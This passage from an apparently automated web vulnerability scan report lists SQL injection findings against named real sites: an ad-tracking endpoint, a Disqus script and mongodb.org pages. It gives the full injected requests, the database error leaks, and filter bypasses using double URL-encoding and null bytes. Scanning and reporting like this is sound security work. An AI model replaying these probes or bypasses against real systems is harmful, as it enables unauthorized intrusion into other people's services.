GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:32 GMT
Expires: Wed, 05 Oct 2011 18:40:32 GMT
Location: http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_300x60.jpg
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-8570ceeb
Content-Length: 228
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3
...[SNIP]...

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337'&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:23 GMT
Expires: Wed, 05 Oct 2011 18:39:24 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 712
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId =
...[SNIP]...

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602'&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:29 GMT
Expires: Wed, 05 Oct 2011 18:39:30 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 785
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @campaignId = 6618, @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @ban
...[SNIP]...

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618'&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:18 GMT
Expires: Wed, 05 Oct 2011 18:39:19 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCSSCRDD=HEMHDJKBGEGGNNEGDGFIEGMK; path=/
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 765
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleI
...[SNIP]...

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606'&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:06 GMT
Expires: Wed, 05 Oct 2011 18:39:06 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSBTCSRB=IGABDBBCCFAANHIDHBEENAAN; path=/
Vary: Accept-Encoding
X-VINDICO-Instance: i-b570cedb
Content-Length: 820
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeI
...[SNIP]...

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922'&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:12 GMT
Expires: Wed, 05 Oct 2011 18:39:12 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-072c8a69
Content-Length: 735
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618,
...[SNIP]...

1.23. http://unionsquareventures.disqus.com/thread.js [sessionid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://unionsquareventures.disqus.com
Path:   /thread.js

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /thread.js?url=http%3A%2F%2Fwww.usv.com%2F2009%2F05%2Fhacking-education.php&title=Hacking%20Education%20&sort=&per_page&category_id=&developer=0&identifier=&disqus_version=1317686231&1317849652881 HTTP/1.1
Host: unionsquareventures.disqus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.usv.com/2009/05/hacking-education.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; sessionid=da6d5c6cb2e467d6962953b510669b19%2527; test=1; __utma=113869458.1840189074.1315055753.1317845533.1317847345.24; __utmb=113869458.10.10.1317847345; __utmc=113869458; __utmz=113869458.1317847345.24.24.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/were-hiring-1.php

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /thread.js?url=http%3A%2F%2Fwww.usv.com%2F2009%2F05%2Fhacking-education.php&title=Hacking%20Education%20&sort=&per_page&category_id=&developer=0&identifier=&disqus_version=1317686231&1317849652881 HTTP/1.1
Host: unionsquareventures.disqus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.usv.com/2009/05/hacking-education.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; sessionid=da6d5c6cb2e467d6962953b510669b19%2527%2527; test=1; __utma=113869458.1840189074.1315055753.1317845533.1317847345.24; __utmb=113869458.10.10.1317847345; __utmc=113869458; __utmz=113869458.1317847345.24.24.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/were-hiring-1.php

Response 2

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:24:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-User: anon:608614822849
Content-Language: en-us
Vary: Accept-Language,Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: test=1; Path=/
Set-Cookie: sessionid=8bd3193c82f194c2337d92506bf48e8a; Domain=.disqus.com; expires=Wed, 19-Oct-2011 21:24:53 GMT; Max-Age=1209600; Path=/
Content-Length: 168925
Connection: close
Content-Type: text/javascript; charset=UTF-8

/*jslint evil:true */
/**
* Dynamic thread loader
*
*
*
*
*
*
*/

//
var DISQUS;
if (!DISQUS || typeof DISQUS == 'function') {
throw "DISQUS object is not initialized";
}
//

// json
...[SNIP]...

1.24. http://www.mongodb.org/dosearchsite.action [queryString parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /dosearchsite.action

Issue detail

The queryString parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the queryString parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /dosearchsite.action?queryString=xss%00'&where=DOCS HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mongodb.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:46:17 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00 at /search/searchpanel.vm[line 46, column 14]<br>
...[SNIP]...

1.25. http://www.mongodb.org/images/border/border_bottom.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /images/border/border_bottom.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /images%2527/border/border_bottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /images%2527%2527/border/border_bottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:14 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 2285

<html>
<head>
   <link rel="stylesheet" type="text/css" href="/styles/main-action.css" />
   <link rel="stylesheet" type="text/css" href="/includes/css/master.css" />
   <link rel="stylesheet" type="text/cs
...[SNIP]...

1.26. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch'/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:14 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.27. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog'/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:16 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

Request 2

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog''/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

1.28. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch'/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:10 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.29. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down'/com.atlassian.auiplugin:drop-down.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:11 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.30. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /s/1627/3/1.0/_%2527/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
